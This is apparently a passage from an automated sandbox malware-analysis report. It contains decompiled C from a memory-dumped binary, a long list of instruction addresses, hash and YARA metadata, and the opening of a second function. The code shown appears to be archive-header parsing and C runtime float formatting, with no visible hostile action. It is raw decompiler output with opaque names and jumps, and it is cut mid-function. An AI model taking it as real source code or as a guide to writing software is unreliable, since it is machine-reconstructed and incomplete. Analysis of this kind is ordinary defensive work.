											if((_t432 |  *(_t544 + 0x54)) != 0) {
												E00CA200C(_t394, _t544 + 0x30, _t432, _t394 + 0x2208);
											}
											L84:
											 *(_t544 + 0x60) =  *(_t544 + 0x48);
											goto L86;
										}
										goto L81;
									}
								}
								if(__eflags <= 0) {
									goto L84;
								}
								__eflags = _t500 - 3;
								if(_t500 <= 3) {
									__eflags = _t500 - 2;
									_t120 = (0 | _t500 != 0x00000002) - 1; // -1
									_t517 = (_t120 & 0xffffdcb0) + 0x45d0 + _t394;
									 *(_t544 + 0x2c) = _t517;
									E00CAA8D2(_t517, 0);
									_t437 = 5;
									memcpy(_t517, _t394 + 0x21e4, _t437 << 2);
									_t539 =  *(_t544 + 0x2c);
									 *(_t544 + 0x60) =  *(_t394 + 0x21e8);
									 *(_t539 + 0x1058) =  *(_t544 + 0x64);
									 *((char*)(_t539 + 0x10f9)) = 1;
									 *(_t539 + 0x105c) =  *(_t544 + 0x5c);
									 *(_t539 + 0x1094) = E00CAC39E(_t500);
									 *(_t539 + 0x1060) = E00CAC39E(_t500);
									_t289 =  *(_t539 + 0x1094) >> 0x00000003 & 0x00000001;
									__eflags = _t289;
									 *(_t539 + 0x1064) = _t500;
									 *(_t539 + 0x109a) = _t289;
									if(_t289 != 0) {
										 *(_t539 + 0x1060) = 0x7fffffff;
										 *(_t539 + 0x1064) = 0x7fffffff;
									}
									_t441 =  *(_t539 + 0x105c);
									_t520 =  *(_t539 + 0x1064);
									_t290 =  *(_t539 + 0x1058);
									_t502 =  *(_t539 + 0x1060);
									__eflags = _t441 - _t520;
									if(__eflags < 0) {
										L51:
										_t290 = _t502;
										_t441 = _t520;
										goto L52;
									} else {
										if(__eflags > 0) {
											L52:
											 *(_t539 + 0x106c) = _t441;
											 *(_t539 + 0x1068) = _t290;
											_t291 = E00CAC39E(_t502);
											__eflags =  *(_t539 + 0x1094) & 0x00000002;
											 *((intOrPtr*)(_t539 + 0x24)) = _t291;
											if(( *(_t539 + 0x1094) & 0x00000002) != 0) {
												E00CB0A25(_t539 + 0x1040, _t502, E00CAC29E(_t544 + 0x30), 0);
											}
											 *(_t539 + 0x1070) =  *(_t539 + 0x1070) & 0x00000000;
											__eflags =  *(_t539 + 0x1094) & 0x00000004;
											if(( *(_t539 + 0x1094) & 0x00000004) != 0) {
												 *(_t539 + 0x1070) = 2;
												 *((intOrPtr*)(_t539 + 0x1074)) = E00CAC29E(_t544 + 0x30);
											}
											 *(_t539 + 0x1100) =  *(_t539 + 0x1100) & 0x00000000;
											_t292 = E00CAC39E(_t502);
											 *(_t544 + 0x64) = _t292;
											 *(_t539 + 0x20) = _t292 >> 0x00000007 & 0x00000007;
											_t449 = (_t292 & 0x0000003f) + 0x32;
											 *((intOrPtr*)(_t539 + 0x1c)) = _t449;
											__eflags = _t449 - 0x32;
											if(_t449 != 0x32) {
												 *((intOrPtr*)(_t539 + 0x1c)) = 0x270f;
											}
											 *((char*)(_t539 + 0x18)) = E00CAC39E(_t502);
											_t521 = E00CAC39E(_t502);
											 *(_t539 + 0x10fc) = 2;
											_t295 =  *((intOrPtr*)(_t539 + 0x18));
											 *(_t539 + 0x10f8) =  *(_t394 + 0x21ec) >> 0x00000006 & 1;
											__eflags = _t295 - 1;
											if(_t295 != 1) {
												__eflags = _t295;
												if(_t295 == 0) {
													_t177 = _t539 + 0x10fc;
													 *_t177 =  *(_t539 + 0x10fc) & 0x00000000;
													__eflags =  *_t177;
												}
											} else {
												 *(_t539 + 0x10fc) = 1;
											}
											_t455 =  *(_t539 + 8);
											 *(_t539 + 0x1098) = _t455 >> 0x00000003 & 1;
											 *(_t539 + 0x10fa) = _t455 >> 0x00000005 & 1;
											__eflags =  *(_t544 + 0x60) - 2;
											_t458 =  *(_t544 + 0x64);
											 *(_t539 + 0x1099) = _t455 >> 0x00000004 & 1;
											if( *(_t544 + 0x60) != 2) {
												L65:
												_t302 = 0;
												__eflags = 0;
												goto L66;
											} else {
												__eflags = _t458 & 0x00000040;
												if((_t458 & 0x00000040) == 0) {
													goto L65;
												}
												_t302 = 1;
												L66:
												 *((char*)(_t539 + 0x10f0)) = _t302;
												_t304 =  *(_t539 + 0x1094) & 1;
												 *(_t539 + 0x10f1) = _t304;
												asm("sbb eax, eax");
												 *(_t539 + 0x10f4) =  !( ~(_t304 & 0x000000ff)) & 0x00020000 << (_t458 >> 0x0000000a & 0x0000000f);
												asm("sbb eax, eax");
												 *(_t539 + 0x109c) =  ~( *(_t539 + 0x109b) & 0x000000ff) & 0x00000005;
												__eflags = _t521 - 0x1fff;
												if(_t521 >= 0x1fff) {
													_t521 = 0x1fff;
												}
												E00CAC300(_t544 + 0x30, _t544 - 0x2074, _t521);
												 *((char*)(_t544 + _t521 - 0x2074)) = 0;
												_push(0x800);
												_t522 = _t539 + 0x28;
												_push(_t539 + 0x28);
												_push(_t544 - 0x2074);
												E00CB1094();
												_t462 =  *(_t544 + 0x58);
												__eflags = _t462 |  *(_t544 + 0x54);
												if((_t462 |  *(_t544 + 0x54)) != 0) {
													E00CA200C(_t394, _t544 + 0x30, _t462, _t539);
												}
												_t319 =  *(_t544 + 0x60);
												__eflags =  *(_t544 + 0x60) - 2;
												if( *(_t544 + 0x60) != 2) {
													L72:
													_t320 = E00CC2B69(_t319, _t522, L"CMT");
													__eflags = _t320;
													if(_t320 == 0) {
														 *((char*)(_t394 + 0x6cb6)) = 1;
													}
													goto L74;
												} else {
													E00CA1F3D(_t394, _t539);
													_t319 =  *(_t544 + 0x60);
													__eflags =  *(_t544 + 0x60) - 2;
													if( *(_t544 + 0x60) == 2) {
														L74:
														__eflags =  *(_t544 + 0x6b);
														if(__eflags != 0) {
															E00CA6BF5(__eflags, 0x1c, _t394 + 0x1e, _t522);
														}
														goto L84;
													}
													goto L72;
												}
											}
										}
										__eflags = _t290 - _t502;
										if(_t290 > _t502) {
											goto L52;
										}
										goto L51;
									}
								}
								__eflags = _t500 - 4;
								if(_t500 == 4) {
									_t470 = 5;
									memcpy(_t394 + 0x2248, _t394 + 0x21e4, _t470 << 2);
									_t331 = E00CAC39E(_t500);
									__eflags = _t331;
									if(_t331 == 0) {
										 *(_t394 + 0x225c) = E00CAC39E(_t500) & 0x00000001;
										_t335 = E00CAC251(_t544 + 0x30) & 0x000000ff;
										 *(_t394 + 0x2260) = _t335;
										__eflags = _t335 - 0x18;
										if(_t335 <= 0x18) {
											E00CAC300(_t544 + 0x30, _t394 + 0x2264, 0x10);
											__eflags =  *(_t394 + 0x225c);
											if( *(_t394 + 0x225c) != 0) {
												E00CAC300(_t544 + 0x30, _t394 + 0x2274, 8);
												E00CAC300(_t544 + 0x30, _t544 + 0x64, 4);
												E00CAF524(_t544 - 0x74);
												E00CAF56A(_t544 - 0x74, _t394 + 0x2274, 8);
												_push(_t544 + 8);
												E00CAF435(_t544 - 0x74);
												_t350 = E00CBF3CA(_t544 + 0x64, _t544 + 8, 4);
												asm("sbb al, al");
												_t352 =  ~_t350 + 1;
												__eflags = _t352;
												 *(_t394 + 0x225c) = _t352;
											}
											 *((char*)(_t394 + 0x6cbc)) = 1;
											goto L84;
										}
										_push(_t335);
										_push(L"hc%u");
										L40:
										_push(0x14);
										_push(_t544);
										E00CA3E41();
										E00CA3DEC(_t394, _t394 + 0x1e, _t544);
										goto L86;
									}
									_push(_t331);
									_push(L"h%u");
									goto L40;
								}
								__eflags = _t500 - 5;
								if(_t500 == 5) {
									_t479 = _t500;
									memcpy(_t394 + 0x4590, _t394 + 0x21e4, _t479 << 2);
									 *(_t394 + 0x45ac) = E00CAC39E(_t500) & 0x00000001;
									 *((short*)(_t394 + 0x45ae)) = 0;
									 *((char*)(_t394 + 0x45ad)) = 0;
								}
								goto L84;
							}
							_t484 = E00CAC39E(_t498);
							 *(_t544 + 0x54) = _t498;
							_t256 = 0;
							 *(_t544 + 0x58) = _t484;
							__eflags = _t498;
							if(__eflags < 0) {
								goto L30;
							}
							if(__eflags > 0) {
								goto L85;
							}
							__eflags = _t484 -  *(_t394 + 0x21f0);
							if(_t484 >=  *(_t394 + 0x21f0)) {
								goto L85;
							}
							goto L30;
						}
						E00CA1EF8(_t394);
						 *((char*)(_t394 + 0x6cc4)) = 1;
						E00CA6E03(0xce00e0, 3);
						__eflags =  *((char*)(_t544 + 0x6a));
						if(__eflags == 0) {
							goto L26;
						} else {
							E00CA6BF5(__eflags, 4, _t394 + 0x1e, _t394 + 0x1e);
							 *((char*)(_t394 + 0x6cc5)) = 1;
							goto L86;
						}
					}
					L17:
					E00CA3DAB(_t394, _t498);
					goto L86;
				}
				_t498 =  *((intOrPtr*)(_t394 + 0x6cc0)) + 8;
				asm("adc eax, ecx");
				_t556 =  *((intOrPtr*)(_t394 + 0x6ca4));
				if(_t556 < 0 || _t556 <= 0 &&  *((intOrPtr*)(_t394 + 0x6ca0)) <= _t498) {
					goto L15;
				} else {
					_push(0x10);
					_push(_t544 + 0x18);
					 *((char*)(_t544 + 0x6a)) = 1;
					if( *((intOrPtr*)( *_t394 + 0xc))() != 0x10) {
						goto L17;
					}
					if( *((char*)( *((intOrPtr*)(_t394 + 0x21bc)) + 0x5124)) != 0) {
						L7:
						 *(_t544 + 0x6b) = 1;
						L8:
						E00CA3C40(_t394);
						_t529 = _t394 + 0x2264;
						_t543 = _t394 + 0x1024;
						E00CA607D(_t543, 0, 5,  *((intOrPtr*)(_t394 + 0x21bc)) + 0x5024, _t394 + 0x2264, _t544 + 0x18,  *(_t394 + 0x2260), 0, _t544 + 0x28);
						if( *(_t394 + 0x225c) == 0) {
							L13:
							 *((intOrPtr*)(_t544 + 0x50)) = _t543;
							goto L16;
						} else {
							_t378 = _t394 + 0x2274;
							while(1) {
								_t380 = E00CBF3CA(_t544 + 0x28, _t378, 8);
								_t546 = _t546 + 0xc;
								if(_t380 == 0) {
									goto L13;
								}
								_t563 =  *(_t544 + 0x6b);
								_t381 = _t394 + 0x1e;
								_push(_t381);
								_push(_t381);
								if( *(_t544 + 0x6b) != 0) {
									_push(6);
									E00CA6BF5(__eflags);
									 *((char*)(_t394 + 0x6cc5)) = 1;
									E00CA6E03(0xce00e0, 0xb);
									goto L86;
								}
								_push(0x7d);
								E00CA6BF5(_t563);
								E00CAE797( *((intOrPtr*)(_t394 + 0x21bc)) + 0x5024);
								E00CA3C40(_t394);
								E00CA607D(_t543, 0, 5,  *((intOrPtr*)(_t394 + 0x21bc)) + 0x5024, _t529, _t544 + 0x18,  *(_t394 + 0x2260), 0, _t544 + 0x28);
								_t378 = _t394 + 0x2274;
								if( *(_t394 + 0x225c) != 0) {
									continue;
								}
								goto L13;
							}
							goto L13;
						}
					}
					_t392 = E00CB0FBA();
					 *(_t544 + 0x6b) = 0;
					if(_t392 == 0) {
						goto L8;
					}
					goto L7;
				}
			}





























































                0x00ca30fc
                0x00ca30fd
                0x00ca3105
                0x00ca310f
                0x00ca3116
                0x00ca311d
                0x00ca3124
                0x00ca3127
                0x00ca3130
                0x00ca3279
                0x00ca3279
                0x00ca327c
                0x00ca3289
                0x00ca329a
                0x00ca32a1
                0x00ca32b1
                0x00ca32bb
                0x00ca32bd
                0x00ca32c4
                0x00ca32c6
                0x00ca38f6
                0x00ca38f8
                0x00ca38fd
                0x00ca3900
                0x00ca390e
                0x00ca3919
                0x00ca3919
                0x00ca32cc
                0x00ca32ce
                0x00000000
                0x00000000
                0x00ca32d4
                0x00ca32da
                0x00ca32dc
                0x00ca32dc
                0x00ca32de
                0x00ca32e1
                0x00000000
                0x00000000
                0x00ca32e7
                0x00ca32ea
                0x00000000
                0x00000000
                0x00ca32f4
                0x00ca32f9
                0x00ca32fc
                0x00000000
                0x00000000
                0x00ca3301
                0x00ca3313
                0x00ca3319
                0x00ca331e
                0x00ca3329
                0x00ca332b
                0x00ca3334
                0x00ca333a
                0x00ca3340
                0x00ca3346
                0x00ca3349
                0x00ca334c
                0x00ca334e
                0x00ca3388
                0x00ca3388
                0x00ca338a
                0x00ca3391
                0x00ca3394
                0x00ca3397
                0x00ca33c1
                0x00ca33c1
                0x00ca33c8
                0x00ca33ca
                0x00ca33cd
                0x00ca33d0
                0x00ca33d5
                0x00ca33da
                0x00ca33dc
                0x00ca33df
                0x00ca33df
                0x00ca33ea
                0x00ca33f7
                0x00ca3406
                0x00ca340f
                0x00ca3417
                0x00ca341e
                0x00ca3424
                0x00ca3426
                0x00ca3837
                0x00ca3846
                0x00ca3847
                0x00ca3851
                0x00ca385a
                0x00ca3867
                0x00ca3876
                0x00ca3881
                0x00ca3884
                0x00ca388a
                0x00ca3890
                0x00ca3892
                0x00ca3898
                0x00ca389b
                0x00ca38b2
                0x00ca389d
                0x00ca38a5
                0x00ca38ad
                0x00ca38af
                0x00ca38af
                0x00ca38b8
                0x00ca38bf
                0x00ca38c9
                0x00ca38c9
                0x00000000
                0x00ca38c1
                0x00ca38c1
                0x00ca38c7
                0x00ca38cb
                0x00ca38cb
                0x00ca38d1
                0x00ca38d6
                0x00ca38d9
                0x00ca38e9
                0x00ca38e9
                0x00ca38ee
                0x00ca38f1
                0x00000000
                0x00ca38f1
                0x00000000
                0x00ca38c7
                0x00ca38bf
                0x00ca342c
                0x00000000
                0x00000000
                0x00ca3432
                0x00ca3435
                0x00ca3577
                0x00ca357f
                0x00ca358e
                0x00ca3592
                0x00ca3595
                0x00ca359c
                0x00ca35a3
                0x00ca35ae
                0x00ca35b1
                0x00ca35b7
                0x00ca35c0
                0x00ca35c7
                0x00ca35d5
                0x00ca35e0
                0x00ca35ef
                0x00ca35ef
                0x00ca35f1
                0x00ca35f7
                0x00ca35fd
                0x00ca3604
                0x00ca360a
                0x00ca360a
                0x00ca3610
                0x00ca3616
                0x00ca361c
                0x00ca3622
                0x00ca3628
                0x00ca362a
                0x00ca3632
                0x00ca3632
                0x00ca3634
                0x00000000
                0x00ca362c
                0x00ca362c
                0x00ca3636
                0x00ca3636
                0x00ca363f
                0x00ca3645
                0x00ca364a
                0x00ca3651
                0x00ca3654
                0x00ca3667
                0x00ca3667
                0x00ca366c
                0x00ca3673
                0x00ca367a
                0x00ca367f
                0x00ca368e
                0x00ca368e
                0x00ca3694
                0x00ca369e
                0x00ca36a5
                0x00ca36ae
                0x00ca36b6
                0x00ca36b9
                0x00ca36bc
                0x00ca36bf
                0x00ca36c1
                0x00ca36c1
                0x00ca36d3
                0x00ca36e7
                0x00ca36e9
                0x00ca36f3
                0x00ca36f8
                0x00ca36fe
                0x00ca3700
                0x00ca370a
                0x00ca370c
                0x00ca370e
                0x00ca370e
                0x00ca370e
                0x00ca370e
                0x00ca3702
                0x00ca3702
                0x00ca3702
                0x00ca3715
                0x00ca371f
                0x00ca3731
                0x00ca3737
                0x00ca373b
                0x00ca373e
                0x00ca3744
                0x00ca374f
                0x00ca374f
                0x00ca374f
                0x00000000
                0x00ca3746
                0x00ca3746
                0x00ca3749
                0x00000000
                0x00000000
                0x00ca374b
                0x00ca3751
                0x00ca3751
                0x00ca375d
                0x00ca3762
                0x00ca3777
                0x00ca377d
                0x00ca378c
                0x00ca3791
                0x00ca379c
                0x00ca379e
                0x00ca37a0
                0x00ca37a0
                0x00ca37ad
                0x00ca37b2
                0x00ca37c0
                0x00ca37c5
                0x00ca37c8
                0x00ca37c9
                0x00ca37ca
                0x00ca37cf
                0x00ca37d4
                0x00ca37d7
                0x00ca37e1
                0x00ca37e1
                0x00ca37e6
                0x00ca37e9
                0x00ca37ec
                0x00ca37fe
                0x00ca3804
                0x00ca380b
                0x00ca380d
                0x00ca380f
                0x00ca380f
                0x00000000
                0x00ca37ee
                0x00ca37f1
                0x00ca37f6
                0x00ca37f9
                0x00ca37fc
                0x00ca3816
                0x00ca3816
                0x00ca381a
                0x00ca3827
                0x00ca3827
                0x00000000
                0x00ca381a
                0x00000000
                0x00ca37fc
                0x00ca37ec
                0x00ca3744
                0x00ca362e
                0x00ca3630
                0x00000000
                0x00000000
                0x00000000
                0x00ca3630
                0x00ca362a
                0x00ca343b
                0x00ca343e
                0x00ca347f
                0x00ca348c
                0x00ca3491
                0x00ca3496
                0x00ca3498
                0x00ca34cf
                0x00ca34da
                0x00ca34dd
                0x00ca34e3
                0x00ca34e6
                0x00ca34fc
                0x00ca3501
                0x00ca3508
                0x00ca3516
                0x00ca3524
                0x00ca352d
                0x00ca3539
                0x00ca3541
                0x00ca3546
                0x00ca3555
                0x00ca355f
                0x00ca3561
                0x00ca3561
                0x00ca3563
                0x00ca3563
                0x00ca3569
                0x00000000
                0x00ca3569
                0x00ca34e8
                0x00ca34e9
                0x00ca34a0
                0x00ca34a3
                0x00ca34a5
                0x00ca34a6
                0x00ca34b8
                0x00000000
                0x00ca34b8
                0x00ca349a
                0x00ca349b
                0x00000000
                0x00ca349b
                0x00ca3440
                0x00ca3443
                0x00ca344a
                0x00ca3457
                0x00ca3463
                0x00ca346b
                0x00ca3472
                0x00ca3472
                0x00000000
                0x00ca3443
                0x00ca33a1
                0x00ca33a3
                0x00ca33a6
                0x00ca33a8
                0x00ca33ab
                0x00ca33ad
                0x00000000
                0x00000000
                0x00ca33af
                0x00000000
                0x00000000
                0x00ca33b5
                0x00ca33bb
                0x00000000
                0x00000000
                0x00000000
                0x00ca33bb
                0x00ca3352
                0x00ca335e
                0x00ca3365
                0x00ca336a
                0x00ca336e
                0x00000000
                0x00ca3370
                0x00ca3377
                0x00ca337c
                0x00000000
                0x00ca337c
                0x00ca336e
                0x00ca328b
                0x00ca328d
                0x00000000
                0x00ca328d
                0x00ca313e
                0x00ca3141
                0x00ca3143
                0x00ca3149
                0x00000000
                0x00ca315d
                0x00ca3162
                0x00ca3164
                0x00ca3167
                0x00ca3171
                0x00000000
                0x00000000
                0x00ca3184
                0x00ca3193
                0x00ca3193
                0x00ca3197
                0x00ca3199
                0x00ca31b5
                0x00ca31c1
                0x00ca31cd
                0x00ca31d9
                0x00ca3255
                0x00ca3255
                0x00000000
                0x00ca31db
                0x00ca31db
                0x00ca31e1
                0x00ca31e8
                0x00ca31ed
                0x00ca31f2
                0x00000000
                0x00000000
                0x00ca31f4
                0x00ca31f8
                0x00ca31fb
                0x00ca31fc
                0x00ca31fd
                0x00ca325a
                0x00ca325c
                0x00ca3268
                0x00ca326f
                0x00000000
                0x00ca326f
                0x00ca31ff
                0x00ca3201
                0x00ca3212
                0x00ca3219
                0x00ca3241
                0x00ca324d
                0x00ca3253
                0x00000000
                0x00000000
                0x00000000
                0x00ca3253
                0x00000000
                0x00ca31e1
                0x00ca31d9
                0x00ca3186
                0x00ca318b
                0x00ca3191
                0x00000000
                0x00000000
                0x00000000
                0x00ca3191

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: H_prolog_memcmp
                • String ID: CMT$h%u$hc%u
                • API String ID: 3004599000-3282847064
                • Opcode ID: fa67cf9226612bf87aef1ae02db21664cb4ec315b8d23ff11ab80b4baed4ea70
                • Instruction ID: c2f640063404fbc933d148e41098efa4f278efca7dbadf90474c2803988458e7
                • Opcode Fuzzy Hash: fa67cf9226612bf87aef1ae02db21664cb4ec315b8d23ff11ab80b4baed4ea70
                • Instruction Fuzzy Hash: 113206715003869FDF14DF74C8A5AEA37A5AF16308F04447EFD5ACB282DB34AA48DB20
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CCC55E, Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 68%
                			E00CCC55E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v32;
				signed int _v36;
				char _v460;
				signed int _v464;
				void _v468;
				signed int _v472;
				signed int _v932;
				signed int _v936;
				signed int _v1392;
				signed int _v1396;
				signed int _v1400;
				char _v1860;
				signed int _v1864;
				signed int _v1865;
				signed int _v1872;
				signed int _v1876;
				signed int _v1880;
				signed int _v1884;
				signed int _v1888;
				signed int _v1892;
				signed int _v1896;
				intOrPtr _v1900;
				signed int _v1904;
				signed int _v1908;
				signed int _v1912;
				signed int _v1916;
				signed int _v1920;
				signed int _v1924;
				signed int _v1928;
				char _v1936;
				char _v1944;
				char _v2404;
				signed int _v2408;
				signed int _t743;
				signed int _t753;
				signed int _t754;
				intOrPtr _t763;
				signed int _t764;
				intOrPtr _t767;
				intOrPtr _t770;
				intOrPtr _t772;
				intOrPtr _t773;
				void* _t774;
				signed int _t777;
				signed int _t778;
				signed int _t784;
				signed int _t790;
				intOrPtr _t792;
				void* _t793;
				signed int _t794;
				signed int _t795;
				signed int _t796;
				signed int _t805;
				signed int _t810;
				signed int _t811;
				signed int _t812;
				signed int _t815;
				signed int _t816;
				signed int _t817;
				signed int _t819;
				signed int _t820;
				signed int _t825;
				signed int _t826;
				signed int _t832;
				signed int _t833;
				signed int _t836;
				signed int _t841;
				signed int _t849;
				signed int* _t852;
				signed int _t856;
				signed int _t867;
				signed int _t868;
				signed int _t870;
				char* _t871;
				signed int _t874;
				signed int _t878;
				signed int _t879;
				signed int _t884;
				signed int _t886;
				signed int _t891;
				signed int _t900;
				signed int _t903;
				signed int _t905;
				signed int _t908;
				signed int _t909;
				signed int _t910;
				signed int _t913;
				signed int _t926;
				signed int _t927;
				signed int _t929;
				char* _t930;
				signed int _t933;
				signed int _t937;
				signed int _t938;
				signed int* _t940;
				signed int _t943;
				signed int _t945;
				signed int _t950;
				signed int _t958;
				signed int _t961;
				signed int _t965;
				signed int* _t972;
				intOrPtr _t974;
				void* _t975;
				intOrPtr* _t977;
				signed int* _t981;
				unsigned int _t992;
				signed int _t993;
				void* _t996;
				signed int _t997;
				void* _t999;
				signed int _t1000;
				signed int _t1001;
				signed int _t1002;
				signed int _t1012;
				signed int _t1017;
				signed int _t1020;
				unsigned int _t1023;
				signed int _t1024;
				void* _t1027;
				signed int _t1028;
				void* _t1030;
				signed int _t1031;
				signed int _t1032;
				signed int _t1033;
				signed int _t1038;
				signed int* _t1043;
				signed int _t1045;
				signed int _t1055;
				void _t1058;
				signed int _t1061;
				void* _t1064;
				void* _t1071;
				signed int _t1077;
				signed int _t1078;
				signed int _t1081;
				signed int _t1082;
				signed int _t1084;
				signed int _t1085;
				signed int _t1086;
				signed int _t1090;
				signed int _t1094;
				signed int _t1095;
				signed int _t1096;
				signed int _t1098;
				signed int _t1099;
				signed int _t1100;
				signed int _t1101;
				signed int _t1102;
				signed int _t1103;
				signed int _t1105;
				signed int _t1106;
				signed int _t1107;
				signed int _t1108;
				signed int _t1109;
				signed int _t1110;
				unsigned int _t1111;
				void* _t1114;
				intOrPtr _t1116;
				signed int _t1117;
				signed int _t1118;
				signed int _t1119;
				signed int* _t1123;
				void* _t1127;
				void* _t1128;
				signed int _t1129;
				signed int _t1130;
				signed int _t1131;
				signed int _t1134;
				signed int _t1135;
				signed int _t1140;
				void* _t1142;
				signed int _t1143;
				signed int _t1146;
				char _t1151;
				signed int _t1153;
				signed int _t1154;
				signed int _t1155;
				signed int _t1156;
				signed int _t1157;
				signed int _t1158;
				signed int _t1159;
				signed int _t1163;
				signed int _t1164;
				signed int _t1165;
				signed int _t1166;
				signed int _t1167;
				unsigned int _t1170;
				void* _t1174;
				void* _t1175;
				unsigned int _t1176;
				signed int _t1181;
				signed int _t1182;
				signed int _t1184;
				signed int _t1185;
				intOrPtr* _t1187;
				signed int _t1188;
				signed int _t1190;
				signed int _t1191;
				signed int _t1194;
				signed int _t1196;
				signed int _t1197;
				void* _t1198;
				signed int _t1199;
				signed int _t1200;
				signed int _t1201;
				void* _t1204;
				signed int _t1205;
				signed int _t1206;
				signed int _t1207;
				signed int _t1208;
				signed int _t1209;
				signed int* _t1212;
				signed int _t1213;
				signed int _t1214;
				signed int _t1215;
				signed int _t1216;
				intOrPtr* _t1218;
				intOrPtr* _t1219;
				signed int _t1221;
				signed int _t1223;
				signed int _t1226;
				signed int _t1232;
				signed int _t1236;
				signed int _t1237;
				signed int _t1242;
				signed int _t1245;
				signed int _t1246;
				signed int _t1247;
				signed int _t1248;
				signed int _t1249;
				signed int _t1250;
				signed int _t1252;
				signed int _t1253;
				signed int _t1254;
				signed int _t1255;
				signed int _t1257;
				signed int _t1258;
				signed int _t1259;
				signed int _t1260;
				signed int _t1261;
				signed int _t1263;
				signed int _t1264;
				signed int _t1266;
				signed int _t1268;
				signed int _t1270;
				signed int _t1273;
				signed int _t1275;
				signed int* _t1276;
				signed int* _t1279;
				signed int _t1288;

				_t1142 = __edx;
				_t1273 = _t1275;
				_t1276 = _t1275 - 0x964;
				_t743 =  *0xcdd668; // 0x814d2927
				_v8 = _t743 ^ _t1273;
				_t1055 = _a20;
				_push(__esi);
				_push(__edi);
				_t1187 = _a16;
				_v1924 = _t1187;
				_v1920 = _t1055;
				E00CCC078( &_v1944, __eflags);
				_t1236 = _a8;
				_t748 = 0x2d;
				if((_t1236 & 0x80000000) == 0) {
					_t748 = 0x120;
				}
				 *_t1187 = _t748;
				 *((intOrPtr*)(_t1187 + 8)) = _t1055;
				_t1188 = _a4;
				if((_t1236 & 0x7ff00000) != 0) {
					L5:
					_t753 = E00CC86BF( &_a4);
					_pop(_t1070);
					__eflags = _t753;
					if(_t753 != 0) {
						_t1070 = _v1924;
						 *((intOrPtr*)(_v1924 + 4)) = 1;
					}
					_t754 = _t753 - 1;
					__eflags = _t754;
					if(_t754 == 0) {
						_push("1#INF");
						goto L308;
					} else {
						_t777 = _t754 - 1;
						__eflags = _t777;
						if(_t777 == 0) {
							_push("1#QNAN");
							goto L308;
						} else {
							_t778 = _t777 - 1;
							__eflags = _t778;
							if(_t778 == 0) {
								_push("1#SNAN");
								goto L308;
							} else {
								__eflags = _t778 == 1;
								if(_t778 == 1) {
									_push("1#IND");
									goto L308;
								} else {
									_v1928 = _v1928 & 0x00000000;
									_a4 = _t1188;
									_a8 = _t1236 & 0x7fffffff;
									_t1288 = _a4;
									asm("fst qword [ebp-0x768]");
									_t1190 = _v1896;
									_v1916 = _a12 + 1;
									_t1077 = _t1190 >> 0x14;
									_t784 = _t1077 & 0x000007ff;
									__eflags = _t784;
									if(_t784 != 0) {
										_t1143 = 0;
										_t784 = 0;
										__eflags = 0;
									} else {
										_t1143 = 1;
									}
									_t1191 = _t1190 & 0x000fffff;
									_t1058 = _v1900 + _t784;
									asm("adc edi, esi");
									__eflags = _t1143;
									_t1078 = _t1077 & 0x000007ff;
									_t1242 = _t1078 - 0x434 + (0 | _t1143 != 0x00000000) + 1;
									_v1872 = _t1242;
									E00CCE0C0(_t1078, _t1288);
									_push(_t1078);
									_push(_t1078);
									 *_t1276 = _t1288;
									_t790 = E00CD0F10(E00CCE1D0(_t1191, _t1242), _t1288);
									_v1904 = _t790;
									__eflags = _t790 - 0x7fffffff;
									if(_t790 == 0x7fffffff) {
										L16:
										__eflags = 0;
										_v1904 = 0;
									} else {
										__eflags = _t790 - 0x80000000;
										if(_t790 == 0x80000000) {
											goto L16;
										}
									}
									_v468 = _t1058;
									__eflags = _t1191;
									_v464 = _t1191;
									_t1061 = (0 | _t1191 != 0x00000000) + 1;
									_v472 = _t1061;
									__eflags = _t1242;
									if(_t1242 < 0) {
										__eflags = _t1242 - 0xfffffc02;
										if(_t1242 == 0xfffffc02) {
											L101:
											_t792 =  *((intOrPtr*)(_t1273 + _t1061 * 4 - 0x1d4));
											_t195 =  &_v1896;
											 *_t195 = _v1896 & 0x00000000;
											__eflags =  *_t195;
											asm("bsr eax, eax");
											if( *_t195 == 0) {
												_t1081 = 0;
												__eflags = 0;
											} else {
												_t1081 = _t792 + 1;
											}
											_t793 = 0x20;
											_t794 = _t793 - _t1081;
											__eflags = _t794 - 1;
											_t795 = _t794 & 0xffffff00 | _t794 - 0x00000001 > 0x00000000;
											__eflags = _t1061 - 0x73;
											_v1865 = _t795;
											_t1082 = _t1081 & 0xffffff00 | _t1061 - 0x00000073 > 0x00000000;
											__eflags = _t1061 - 0x73;
											if(_t1061 != 0x73) {
												L107:
												_t796 = 0;
												__eflags = 0;
											} else {
												__eflags = _t795;
												if(_t795 == 0) {
													goto L107;
												} else {
													_t796 = 1;
												}
											}
											__eflags = _t1082;
											if(_t1082 != 0) {
												L126:
												_v1400 = _v1400 & 0x00000000;
												_t224 =  &_v472;
												 *_t224 = _v472 & 0x00000000;
												__eflags =  *_t224;
												E00CCAA64( &_v468, 0x1cc,  &_v1396, 0);
												_t1276 =  &(_t1276[4]);
											} else {
												__eflags = _t796;
												if(_t796 != 0) {
													goto L126;
												} else {
													_t1109 = 0x72;
													__eflags = _t1061 - _t1109;
													if(_t1061 < _t1109) {
														_t1109 = _t1061;
													}
													__eflags = _t1109 - 0xffffffff;
													if(_t1109 != 0xffffffff) {
														_t1260 = _t1109;
														_t1218 =  &_v468 + _t1109 * 4;
														_v1880 = _t1218;
														while(1) {
															__eflags = _t1260 - _t1061;
															if(_t1260 >= _t1061) {
																_t208 =  &_v1876;
																 *_t208 = _v1876 & 0x00000000;
																__eflags =  *_t208;
															} else {
																_v1876 =  *_t1218;
															}
															_t210 = _t1260 - 1; // 0x70
															__eflags = _t210 - _t1061;
